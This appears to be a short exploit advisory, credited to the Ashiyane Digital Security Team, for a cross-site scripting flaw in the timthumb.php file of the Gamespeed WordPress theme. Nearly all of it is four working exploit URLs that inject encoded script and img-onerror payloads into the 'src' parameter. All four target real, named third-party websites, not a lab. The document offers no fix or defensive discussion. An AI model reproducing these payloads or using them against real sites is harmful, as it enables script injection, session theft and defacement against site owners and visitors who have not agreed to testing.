###################### # Exploit Title : Wordpress Gamespeed Theme Cross Site Scripting # Exploit Author : Ashiyane Digital Security Team # Vendor Homepage : http://www.dalih.net/ # Date: 3/8/2014 # Tested On : Linux , Windows # Software Link : http://www.dalih.net/wordpress-themes/game-speed/ ###################### # http://www.centrecatala.cl/wp-content/themes/gamespeed/includes/timthumb.php?h=80&src=%22%3E%3Cimg%20src=aa%20onerror=prompt%28/xss/%29%3E # http://radiohope.com.ar/wp-content/themes/gamespeed/includes/timthumb.php?h=80&src=%3Cscript%3Ealert%28/xss/%29%3C/script%3E # http://www.gameactors.com/wp-content/themes/gamespeed/includes/timthumb.php?h=80&src=%3Cscript%3Ealert%28/xss/%29%3C/script%3E # http://300mbfilms.ir/wp-content/themes/gamespeed/includes/timthumb.php?h=80&src=%3Cscript%3Ealert%28/xss/%29%3C/script%3E ###################### # discovered by : Mahdi.Hidden ######################